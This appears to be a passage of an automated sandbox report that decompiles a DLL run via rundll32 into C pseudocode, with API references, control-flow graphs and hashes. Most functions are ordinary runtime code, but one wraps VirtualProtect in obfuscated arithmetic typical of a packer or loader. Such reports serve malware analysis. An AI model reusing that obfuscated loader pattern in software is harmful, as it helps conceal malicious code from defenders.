                                                                        						 *((intOrPtr*)(_t22 - 0x1c)) = _t12;
                                                                        						if(_t12 != 0) {
                                                                        							_push(_t21);
                                                                        							_push(_t12);
                                                                        							E10013BC6();
                                                                        						}
                                                                        						 *(_t22 - 4) =  *(_t22 - 4) | 0xffffffff;
                                                                        						_t9 = E1001081B();
                                                                        						if( *((intOrPtr*)(_t22 - 0x1c)) == 0) {
                                                                        							_push( *((intOrPtr*)(_t22 + 8)));
                                                                        							L7:
                                                                        							_push(0);
                                                                        							_t9 = RtlFreeHeap( *0x10050a60); // executed
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return E1001254F(_t9);
                                                                        			}








                                                                        APIs
                                                                        • __lock.LIBCMT ref: 100107E6
                                                                          • Part of subcall function 10013A38: EnterCriticalSection.KERNEL32(?,?,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?), ref: 10013A60
                                                                        • RtlFreeHeap.NTDLL(00000000,?,10041D10,0000000C,10013A1C,00000000,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010), ref: 1001082D
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalEnterFreeHeapSection__lock
                                                                        • String ID:
                                                                        • API String ID: 3012239193-0
                                                                        • Opcode ID: a4ec4e95e76719edca13298b27ffeb92ed14bb756df65cea7ebe692d9a49c22e
                                                                        • Instruction ID: e2f95eda502a26e356ba5135cb18e14e48cd53293581a9dd67e0285628cf36ea
                                                                        • Opcode Fuzzy Hash: a4ec4e95e76719edca13298b27ffeb92ed14bb756df65cea7ebe692d9a49c22e
                                                                        • Instruction Fuzzy Hash: C0F09635D0A215AAEB10DB60CC46B4E3B64EF00760F208014F5906D0D1DF74E5C0CAD5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 282 1001070f-10010725 call 10012514 285 10010755-10010757 282->285 286 10010727-1001072d 282->286 288 10010759 285->288 289 1001075a-10010761 285->289 286->285 287 1001072f-10010753 call 10013a38 call 1001437a call 10010781 286->287 287->285 293 10010778-1001077d call 1001254f 287->293 288->289 291 10010763-10010766 289->291 292 10010769-10010772 RtlAllocateHeap 289->292 291->292 292->293
                                                                        C-Code - Quality: 63%
                                                                        			E1001070F(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                        				long _t19;
                                                                        				void* _t21;
                                                                        				void* _t24;
                                                                        
                                                                        				_push(0xc);
                                                                        				_push(0x10041d00);
                                                                        				E10012514(__ebx, __edi, __esi);
                                                                        				_t19 =  *(_t21 + 8);
                                                                        				if( *0x10050a64 != 3) {
                                                                        					L3:
                                                                        					if(_t19 == 0) {
                                                                        						_t19 = _t19 + 1;
                                                                        					}
                                                                        					if( *0x10050a64 != 1) {
                                                                        						_t19 = _t19 + 0x0000000f & 0xfffffff0;
                                                                        					}
                                                                        					_t9 = RtlAllocateHeap( *0x10050a60, 0, _t19); // executed
                                                                        				} else {
                                                                        					_t24 = _t19 -  *0x10050a50; // 0x0
                                                                        					if(_t24 > 0) {
                                                                        						goto L3;
                                                                        					} else {
                                                                        						E10013A38(__ebx, __edi, 4);
                                                                        						 *(_t21 - 4) =  *(_t21 - 4) & 0x00000000;
                                                                        						_push(_t19);
                                                                        						 *(_t21 - 0x1c) = E1001437A();
                                                                        						 *(_t21 - 4) =  *(_t21 - 4) | 0xffffffff;
                                                                        						E10010781();
                                                                        						_t9 =  *(_t21 - 0x1c);
                                                                        						if( *(_t21 - 0x1c) == 0) {
                                                                        							goto L3;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return E1001254F(_t9);
                                                                        			}







                                                                        APIs
                                                                        • __lock.LIBCMT ref: 10010731
                                                                          • Part of subcall function 10013A38: EnterCriticalSection.KERNEL32(?,?,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?), ref: 10013A60
                                                                        • RtlAllocateHeap.NTDLL(00000000,?,10041D00,0000000C,1001079A,000000E0,100107C5,?,100139BB,00000018,10041E50,00000008,10013A51,?,?), ref: 10010772
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateCriticalEnterHeapSection__lock
                                                                        • String ID:
                                                                        • API String ID: 409319249-0
                                                                        • Opcode ID: 50d20e50f01447f42db1d42bb29e4d21c1024c3df395ccd2c9c31703fcb81017
                                                                        • Instruction ID: 42b023ab18c65cc465c375f16582ad1359b716bf9f3aedd515ba29da9f54a78b
                                                                        • Opcode Fuzzy Hash: 50d20e50f01447f42db1d42bb29e4d21c1024c3df395ccd2c9c31703fcb81017
                                                                        • Instruction Fuzzy Hash: 1DF06D75E45665ABEB10EB708C4AB8D7BB4FB003A1F150114F9A1AE1E1D7B0BAC08E95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 301 10013a83-10013aa1 HeapCreate 302 10013aa3-10013ab0 call 10013a69 301->302 303 10013acd-10013acf 301->303 306 10013ad0-10013ad3 302->306 307 10013ab2-10013abf call 10013b53 302->307 307->306 310 10013ac1-10013ac7 HeapDestroy 307->310 310->303
                                                                        C-Code - Quality: 100%
                                                                        			E10013A83(intOrPtr _a4) {
                                                                        				void* _t6;
                                                                        				intOrPtr _t8;
                                                                        
                                                                        				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                        				 *0x10050a60 = _t6;
                                                                        				if(_t6 == 0) {
                                                                        					L4:
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t8 = E10013A69();
                                                                        					 *0x10050a64 = _t8;
                                                                        					if(_t8 != 3 || E10013B53(0x3f8) != 0) {
                                                                        						return 1;
                                                                        					} else {
                                                                        						HeapDestroy( *0x10050a60);
                                                                        						goto L4;
                                                                        					}
                                                                        				}
                                                                        			}






                                                                        APIs
                                                                        • HeapCreate.KERNEL32(00000000,00001000,00000000,10011217,00000001,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013A94
                                                                          • Part of subcall function 10013B53: HeapAlloc.KERNEL32(00000000,00000140,10013ABC,000003F8,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B60
                                                                        • HeapDestroy.KERNEL32(?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013AC7
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$AllocCreateDestroy
                                                                        • String ID:
                                                                        • API String ID: 2236781399-0
                                                                        • Opcode ID: f6a2f7532e9ba5cb0f586e1f719da1c5d5a79765111272051b74937e09fd73f5
                                                                        • Instruction ID: e8a57e519fdf56151fc66cac883b31846c607769bf618c359d49edee3f1857a7
                                                                        • Opcode Fuzzy Hash: f6a2f7532e9ba5cb0f586e1f719da1c5d5a79765111272051b74937e09fd73f5
                                                                        • Instruction Fuzzy Hash: 6BE01A74A953559EEB01EB718C45B1A37E4EB44682F488829F442CD4A1EB70D680A602
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 311 10003310-10003320 312 10003322-1000332a 311->312 313 1000332b-10003374 311->313 314 100033fa-100034e1 313->314 315 1000337a-10003387 313->315 316 10003500-1000356c VirtualProtect 314->316 317 100034e3-100034fc 314->317 318 10003389-1000338e 315->318 319 100033ed-100033f9 315->319 317->316 320 10003390-1000339c 318->320 321 100033cd-100033ea 318->321 320->321 322 1000339e-100033cb 320->322 321->319 322->319 322->321
                                                                        C-Code - Quality: 89%
                                                                        			E10003310() {
                                                                        				long _t80;
                                                                        				signed int _t83;
                                                                        				signed int _t87;
                                                                        				intOrPtr _t91;
                                                                        				signed int _t101;
                                                                        				signed int _t116;
                                                                        				signed int _t122;
                                                                        				intOrPtr _t126;
                                                                        				signed int _t127;
                                                                        				signed int _t132;
                                                                        				signed int _t135;
                                                                        				intOrPtr* _t137;
                                                                        				intOrPtr* _t141;
                                                                        				signed int _t150;
                                                                        				signed int _t158;
                                                                        				signed int _t165;
                                                                        				signed int _t175;
                                                                        				signed int _t186;
                                                                        				signed int _t216;
                                                                        				signed int _t223;
                                                                        				signed int _t227;
                                                                        				intOrPtr _t235;
                                                                        				signed int _t238;
                                                                        				void* _t239;
                                                                        
                                                                        				_t80 =  *(_t239 + 0x18);
                                                                        				_t126 =  *((intOrPtr*)(_t80 + 8));
                                                                        				 *((intOrPtr*)(_t239 + 8)) = _t126;
                                                                        				if(_t126 != 0) {
                                                                        					_t132 =  *(_t80 + 0xc);
                                                                        					_t127 =  *0x1004b0dc; // 0x0
                                                                        					_t5 = _t127 + 1; // 0x1
                                                                        					_t101 =  *0x1004b0ec; // 0x0
                                                                        					_t165 =  *0x1004b0e0; // 0x0
                                                                        					_t7 = _t165 + 0x1000000; // 0x1000000
                                                                        					_t83 =  *0x1004b0e4; // 0x0
                                                                        					_t150 =  *0x1004b0d8; // 0x0
                                                                        					 *(_t239 + 0x10) = _t132;
                                                                        					if((_t132 & _t83 * 0x7fffffff + _t165 + _t7 - _t5 * _t127 + _t101 + _t150 << 0x00000001) == 0) {
                                                                        						_t35 = _t83 * _t165 + 1; // 0x1
                                                                        						 *(_t239 + 0x1c) = _t83 * _t165;
                                                                        						_t135 =  *0x1004b0e8; // 0x0
                                                                        						asm("sbb ebp, ebp");
                                                                        						asm("sbb edi, edi");
                                                                        						_t216 =  *0x1004b0d8; // 0x0
                                                                        						_t223 =  *0x1004b0d8; // 0x0
                                                                        						asm("sbb esi, esi");
                                                                        						_t158 =  *0x1004b0ec; // 0x0
                                                                        						 *(_t239 + 0x14) =  *(0x1004b0f4 + ( ~( ~(_t135 * 0x7fffffff + (0x00000001 - _t135) * _t83 * _t165 +  *0x1004b0d8 + ((0x00000001 - _t216) * _t127 - _t83) * _t127 + _t135 * 0x7fffffff + (0x00000001 - _t135) * _t83 * _t165 +  *0x1004b0d8 + ((0x00000001 - _t216) * _t127 - _t83) * _t127 - 0x80000000 &  *(_t239 + 0x10))) + ( ~( ~(0x40000000 + ((_t35 * 0x3fffffff + _t135) * _t127 + (_t135 * _t165 + 0x00000001) * _t150) * 0x00000004 &  *(_t239 + 0x10))) +  ~( ~(_t150 + _t135 * 0x00000002 + _t135 + _t150 + _t135 * 0x00000002 + _t135 + 0x20000000 &  *(_t239 + 0x10))) * 2) * 2) * 4);
                                                                        						_t175 =  *0x1004b0e0; // 0x0
                                                                        						_t116 = _t158 * _t127;
                                                                        						if(( *(_t239 + 0x10) & (_t116 * _t127 + _t116 * _t127 * 0x00000002 - 0x00000006) * _t127 + _t175 + _t175 - _t135 - _t158 + _t83 + _t223 + (_t175 + _t175 - _t135 - _t158 + _t83 + _t223) * 0x00000002 + 0x04000000) != 0) {
                                                                        							 *(_t239 + 0x14) =  *(_t239 + 0x14) | _t158 * _t83 *  *0x1004b0e0 + 0x00000200 + _t158 * _t83 *  *0x1004b0e0 * 0x00000002;
                                                                        						}
                                                                        						_t186 =  *0x1004b0e0; // 0x0
                                                                        						_t227 = _t158 * 0x3fffffff;
                                                                        						_t122 =  *0x1004b0d8; // 0x0
                                                                        						_t74 = _t227 + 1; // 0x1
                                                                        						_t87 = VirtualProtect( *( *(_t239 + 0x30)),  *((intOrPtr*)(_t239 + 0x20)) + (_t83 * 0x3fffffff + (_t122 + _t74) * _t186 + _t122 + (2 -  *((intOrPtr*)(_t239 + 0x24)) - _t135 - _t158) * _t127) * 4,  *(_t239 + 0x18), _t239 + 0x28 + ((_t116 + _t135) * _t158 + _t186) * 8); // executed
                                                                        						asm("sbb eax, eax");
                                                                        						return  ~( ~_t87);
                                                                        					} else {
                                                                        						_t137 =  *((intOrPtr*)(_t239 + 0x28));
                                                                        						_t235 =  *_t137;
                                                                        						 *((intOrPtr*)(_t239 + 0x28)) = _t235;
                                                                        						if(_t235 ==  *((intOrPtr*)(_t137 + 4))) {
                                                                        							if( *((intOrPtr*)(_t137 + 0x10)) != 0) {
                                                                        								L7:
                                                                        								_t91 =  *((intOrPtr*)(_t239 + 0x24));
                                                                        								 *((intOrPtr*)(_t91 + 0x20))( *(_t239 + 0x30),  *(_t239 + 0x1c), 0x4000 - _t101,  *((intOrPtr*)(_t91 + 0x34)));
                                                                        							} else {
                                                                        								_t141 =  *((intOrPtr*)(_t239 + 0x24));
                                                                        								_t238 =  *(_t141 + 0x3c);
                                                                        								if( *((intOrPtr*)( *_t141 + 0x38)) == _t238 || (_t150 + 2) * _t101 + _t83 + _t165 * 2 + ((_t150 + 2) * _t101 + _t83 + _t165 * 2) * 2 - (_t83 * _t127 * _t127 + 3 + _t83 * _t127 * _t127 * 2) *  *0x1004b0e8 +  *(_t239 + 0x18) % _t238 == 0) {
                                                                        									goto L7;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						return 1;
                                                                        					}
                                                                        				} else {
                                                                        					return 1;
                                                                        				}
                                                                        			}

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f94f5a31096f78052b225d6198edabbe45c52cabc43602b45e44eff5801c83ed
                                                                        • Instruction ID: 1dc449bc3d80b5784a3a7ae21000a0fc3896a9c870339c3573936ee24331a343
                                                                        • Opcode Fuzzy Hash: f94f5a31096f78052b225d6198edabbe45c52cabc43602b45e44eff5801c83ed
                                                                        • Instruction Fuzzy Hash: 1A7129335043298FD314DF58C9C1646B7E9FB89310F058A2EDD699B3A5E670FE098AC4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 324 10037855-10037867 call 10011bf0 327 10037897-100378a8 call 10037552 324->327 328 10037869-10037871 324->328 336 100378aa-100378b8 call 10037732 327->336 337 100378bd-100378cc 327->337 330 10037873-1003788a call 1003768d 328->330 331 10037890 call 10037446 328->331 330->331 335 10037895 331->335 335->327 336->337
                                                                        C-Code - Quality: 94%
                                                                        			E10037855(intOrPtr* __ecx) {
                                                                        				intOrPtr _t12;
                                                                        				intOrPtr _t14;
                                                                        				signed char* _t15;
                                                                        				long* _t17;
                                                                        				long* _t19;
                                                                        				intOrPtr _t23;
                                                                        				intOrPtr* _t26;
                                                                        				void* _t28;
                                                                        
                                                                        				E10011BF0(0x1003aa13, _t28);
                                                                        				_push(__ecx);
                                                                        				_t26 = __ecx;
                                                                        				if( *__ecx == 0) {
                                                                        					_t20 =  *0x1004eff0; // 0x1004eff4
                                                                        					if(_t20 == 0) {
                                                                        						 *((intOrPtr*)(_t28 - 0x10)) = 0x1004eff4;
                                                                        						 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
                                                                        						_t15 = E1003768D(0x1004eff4);
                                                                        						 *(_t28 - 4) =  *(_t28 - 4) | 0xffffffff;
                                                                        						_t20 = _t15;
                                                                        						 *0x1004eff0 = _t15; // executed
                                                                        					}
                                                                        					_t14 = E10037446(_t20); // executed
                                                                        					 *_t26 = _t14;
                                                                        				}
                                                                        				_t17 =  *0x1004eff0; // 0x1004eff4
                                                                        				_t23 = E10037552(_t17,  *_t26);
                                                                        				if(_t23 == 0) {
                                                                        					_t12 =  *((intOrPtr*)(_t28 + 8))();
                                                                        					_t19 =  *0x1004eff0; // 0x1004eff4
                                                                        					_t23 = _t12;
                                                                        					E10037732(_t19,  *_t26, _t23);
                                                                        				}
                                                                        				 *[fs:0x0] =  *((intOrPtr*)(_t28 - 0xc));
                                                                        				return _t23;
                                                                        			}

                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 1003785A
                                                                          • Part of subcall function 1003768D: TlsAlloc.KERNEL32(?,10037884,?,?,?,100373C4,100347FD,100071DC), ref: 100376AF
                                                                        Similarity
                                                                        • API ID: AllocH_prolog
                                                                        • String ID:
                                                                        • API String ID: 3910492588-0
                                                                        • Opcode ID: afc1abf3d35d6b52cdf0f25188e220ecb9e5087980f930720a4386ab5437719b
                                                                        • Instruction ID: 4636a69bf69d573d2e706337ed3b04a464365e57385db0f45bc25e4442f629a4
                                                                        • Opcode Fuzzy Hash: afc1abf3d35d6b52cdf0f25188e220ecb9e5087980f930720a4386ab5437719b
                                                                        • Instruction Fuzzy Hash: 80018B396001A29FE72ACF18C851B6D77A2FB81362F10053EE996DB290DB349C00CB64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E100045D0(void* _a4, long _a8, long _a12, long _a16) {
                                                                        				void* _t7;
                                                                        
                                                                        				_t7 = VirtualAlloc(_a4, _a8, _a12, _a16); // executed
                                                                        				return _t7;
                                                                        			}





                                                                        APIs
                                                                        • VirtualAlloc.KERNEL32(?,?,?,?), ref: 100045E4
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 79d8040eb94a772a3858464c411fe2626b1031866cac9e3cc93b0a28150a8e2a
                                                                        • Instruction ID: c6cc4055dfec23ff58d81a81712461c79eda0eebf3d1de213efbbce8f3264bb9
                                                                        • Opcode Fuzzy Hash: 79d8040eb94a772a3858464c411fe2626b1031866cac9e3cc93b0a28150a8e2a
                                                                        • Instruction Fuzzy Hash: FCC0EAB9608201AF9A04DB54C988C6BB7E9EBC8641F008909B59983210D630E8408B22
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E100045F0(void* _a4, long _a8, long _a12) {
                                                                        				int _t5;
                                                                        
                                                                        				_t5 = VirtualFree(_a4, _a8, _a12); // executed
                                                                        				return _t5;
                                                                        			}





                                                                        APIs
                                                                        • VirtualFree.KERNELBASE(?,?,?), ref: 100045FF
                                                                        Similarity
                                                                        • API ID: FreeVirtual
                                                                        • String ID:
                                                                        • API String ID: 1263568516-0
                                                                        • Opcode ID: 174df1bf701f566af763c199529526010cd62a485baa78f61ffb0b3445841b2f
                                                                        • Instruction ID: 188741ce2ee140a107eafa4ec0cdb16d021ba485332012740db5241ef1f15393
                                                                        • Opcode Fuzzy Hash: 174df1bf701f566af763c199529526010cd62a485baa78f61ffb0b3445841b2f
                                                                        • Instruction Fuzzy Hash: D3C048B9218201BFEA04DB50CA88C2BB7A9EBC8A11F00C90DB88983210C630EC00DA22
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 96%
                                                                        			E1001D99B(signed int __ecx) {
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t108;
                                                                        				void* _t111;
                                                                        				signed int _t112;
                                                                        				signed int _t113;
                                                                        				signed int _t115;
                                                                        				intOrPtr _t119;
                                                                        				void* _t132;
                                                                        				signed int _t136;
                                                                        				signed int _t140;
                                                                        				void* _t148;
                                                                        				intOrPtr* _t155;
                                                                        				signed int _t157;
                                                                        				signed int _t169;
                                                                        				signed int _t170;
                                                                        				signed int _t173;
                                                                        				signed int _t183;
                                                                        				void* _t185;
                                                                        				signed short _t192;
                                                                        				void* _t195;
                                                                        				void* _t198;
                                                                        				void* _t200;
                                                                        				void* _t201;
                                                                        				void* _t204;
                                                                        
                                                                        				_t108 = E10011BF0(0x1003b3ea, _t198);
                                                                        				_t201 = _t200 - 0x7c;
                                                                        				_t155 =  *((intOrPtr*)(_t198 + 8));
                                                                        				_t192 =  *(_t155 + 4);
                                                                        				_t183 = __ecx;
                                                                        				 *(_t198 - 0x10) = __ecx;
                                                                        				 *(_t198 - 0x1c) = _t192;
                                                                        				if(_t192 == 0x200 || _t192 == 0xa0 || _t192 == 0x202 || _t192 == 0x205 || _t192 == 0x208) {
                                                                        					_t108 = GetKeyState(1);
                                                                        					if(_t108 < 0) {
                                                                        						L46:
                                                                        						_t192 =  *(_t198 - 0x1c);
                                                                        						goto L47;
                                                                        					}
                                                                        					_t108 = GetKeyState(2);
                                                                        					if(_t108 < 0) {
                                                                        						goto L46;
                                                                        					}
                                                                        					_t108 = GetKeyState(4);
                                                                        					if(_t108 < 0) {
                                                                        						goto L46;
                                                                        					} else {
                                                                        						_t111 = E100373DB();
                                                                        						_push( *_t155);
                                                                        						_t195 = _t111;
                                                                        						 *(_t198 - 0x18) = _t195;
                                                                        						while(1) {
                                                                        							_t108 = E100220EE(_t198);
                                                                        							if(_t108 == 0) {
                                                                        								break;
                                                                        							}
                                                                        							__eflags =  *(_t108 + 0x38) & 0x00000401;
                                                                        							if(( *(_t108 + 0x38) & 0x00000401) != 0) {
                                                                        								break;
                                                                        							} else {
                                                                        								_push(GetParent( *(_t108 + 0x1c)));
                                                                        								continue;
                                                                        							}
                                                                        						}
                                                                        						if(_t108 == _t183) {
                                                                        							_t157 =  *(_t195 + 0x3c);
                                                                        							_t112 = E100223DE(_t183);
                                                                        							__eflags = _t157;
                                                                        							 *(_t198 - 0x14) = _t112;
                                                                        							if(_t157 == 0) {
                                                                        								L19:
                                                                        								_t113 = E1001F77E(0x6c);
                                                                        								 *(_t198 - 0x1c) = _t113;
                                                                        								_t157 = 0;
                                                                        								__eflags = _t113;
                                                                        								 *(_t198 - 4) = 0;
                                                                        								if(__eflags != 0) {
                                                                        									_t157 = E1001D6C7(_t113, __eflags);
                                                                        								}
                                                                        								 *(_t198 - 4) =  *(_t198 - 4) | 0xffffffff;
                                                                        								_t115 =  *((intOrPtr*)( *_t157 + 0x130))( *(_t198 - 0x14), 1);
                                                                        								__eflags = _t115;
                                                                        								if(_t115 != 0) {
                                                                        									SendMessageA( *(_t157 + 0x1c), 0x401, 0, 0);
                                                                        									_t183 =  *(_t198 - 0x10);
                                                                        									 *(_t195 + 0x3c) = _t157;
                                                                        									L24:
                                                                        									E10011C50(_t198 - 0x88, 0, 0x30);
                                                                        									_t119 =  *((intOrPtr*)(_t198 + 8));
                                                                        									 *((intOrPtr*)(_t198 - 0x24)) =  *((intOrPtr*)(_t119 + 0x18));
                                                                        									 *(_t198 - 0x28) =  *(_t119 + 0x14);
                                                                        									ScreenToClient( *(_t183 + 0x1c), _t198 - 0x28);
                                                                        									E10011C50(_t198 - 0x58, 0, 0x30);
                                                                        									_t204 = _t201 + 0x18;
                                                                        									 *(_t198 - 0x58) = 0x28;
                                                                        									_t108 =  *((intOrPtr*)( *_t183 + 0x6c))( *(_t198 - 0x28),  *((intOrPtr*)(_t198 - 0x24)), _t198 - 0x58);
                                                                        									asm("sbb ecx, ecx");
                                                                        									_t169 =  ~(_t108 + 1) & _t183;
                                                                        									__eflags =  *(_t195 + 0x44) - _t108;
                                                                        									 *(_t198 - 0x1c) = _t108;
                                                                        									 *(_t198 - 0x14) = _t169;
                                                                        									if( *(_t195 + 0x44) != _t108) {
                                                                        										L30:
                                                                        										__eflags = _t108 - 0xffffffff;
                                                                        										if(_t108 == 0xffffffff) {
                                                                        											SendMessageA( *(_t157 + 0x1c), 0x401, 0, 0);
                                                                        											L39:
                                                                        											E1001D919(_t157,  *((intOrPtr*)(_t198 + 8)));
                                                                        											_t83 = _t195 + 0x48; // 0x48
                                                                        											_t185 = _t83;
                                                                        											__eflags =  *_t185 - 0x28;
                                                                        											if( *_t185 >= 0x28) {
                                                                        												SendMessageA( *(_t157 + 0x1c), 0x405, 0, _t185);
                                                                        											}
                                                                        											 *(_t195 + 0x40) =  *(_t198 - 0x14);
                                                                        											 *(_t195 + 0x44) =  *(_t198 - 0x1c);
                                                                        											_t170 = 0xc;
                                                                        											_t195 = _t198 - 0x58;
                                                                        											_t108 = memcpy(_t185, _t195, _t170 << 2);
                                                                        											_t183 = _t195 + _t170 + _t170;
                                                                        											L42:
                                                                        											__eflags =  *((intOrPtr*)(_t198 - 0x34)) - 0xffffffff;
                                                                        											if( *((intOrPtr*)(_t198 - 0x34)) != 0xffffffff) {
                                                                        												__eflags =  *(_t198 - 0x38);
                                                                        												if(__eflags == 0) {
                                                                        													_push( *((intOrPtr*)(_t198 - 0x34)));
                                                                        													_t108 = E100107C8(_t157, _t183, _t195, __eflags);
                                                                        												}
                                                                        											}
                                                                        											goto L75;
                                                                        										}
                                                                        										_t173 = 0xc;
                                                                        										_t132 = memcpy(_t198 - 0x88, _t198 - 0x58, _t173 << 2);
                                                                        										_t204 = _t204 + 0xc;
                                                                        										 *(_t198 - 0x81) =  *(_t198 - 0x81) & 0x0000003f;
                                                                        										__eflags =  *(_t132 + 0x38) & 0x00000400;
                                                                        										if(( *(_t132 + 0x38) & 0x00000400) != 0) {
                                                                        											_t65 = _t198 - 0x84;
                                                                        											 *_t65 =  *(_t198 - 0x84) | 0x00000020;
                                                                        											__eflags =  *_t65;
                                                                        										}
                                                                        										SendMessageA( *(_t157 + 0x1c), 0x404, 0, _t198 - 0x88);
                                                                        										__eflags =  *(_t198 - 0x51) & 0x00000040;
                                                                        										if(( *(_t198 - 0x51) & 0x00000040) != 0) {
                                                                        											L35:
                                                                        											SendMessageA( *(_t157 + 0x1c), 0x401, 1, 0);
                                                                        											_t136 =  *(_t198 - 0x10);
                                                                        											__eflags =  *(_t136 + 0x38) & 0x00000400;
                                                                        											if(( *(_t136 + 0x38) & 0x00000400) != 0) {
                                                                        												SendMessageA( *(_t157 + 0x1c), 0x411, 1, _t198 - 0x88);
                                                                        											}
                                                                        											SetWindowPos( *(_t157 + 0x1c), 0, 0, 0, 0, 0, 0x213);
                                                                        											goto L38;
                                                                        										} else {
                                                                        											_t140 = E100230BA();
                                                                        											__eflags = _t140;
                                                                        											if(_t140 == 0) {
                                                                        												L38:
                                                                        												_t195 =  *(_t198 - 0x18);
                                                                        												goto L39;
                                                                        											}
                                                                        											goto L35;
                                                                        										}
                                                                        									}
                                                                        									__eflags =  *(_t195 + 0x40) - _t169;
                                                                        									if( *(_t195 + 0x40) != _t169) {
                                                                        										goto L30;
                                                                        									}
                                                                        									__eflags =  *(_t183 + 0x39) & 0x00000004;
                                                                        									if(( *(_t183 + 0x39) & 0x00000004) == 0) {
                                                                        										__eflags = _t108 - 0xffffffff;
                                                                        										if(_t108 != 0xffffffff) {
                                                                        											_t108 = E1001D919(_t157,  *((intOrPtr*)(_t198 + 8)));
                                                                        										}
                                                                        									} else {
                                                                        										GetCursorPos(_t198 - 0x20);
                                                                        										_t108 = SendMessageA( *(_t157 + 0x1c), 0x412, 0, ( *(_t198 - 0x1c) & 0x0000ffff) << 0x00000010 |  *(_t198 - 0x20) & 0x0000ffff);
                                                                        									}
                                                                        									goto L42;
                                                                        								} else {
                                                                        									_t108 =  *((intOrPtr*)( *_t157 + 4))(1);
                                                                        									goto L75;
                                                                        								}
                                                                        							}
                                                                        							_t148 = E10008325(_t157);
                                                                        							__eflags = _t148 -  *(_t198 - 0x14);
                                                                        							if(_t148 !=  *(_t198 - 0x14)) {
                                                                        								 *((intOrPtr*)( *_t157 + 0x60))();
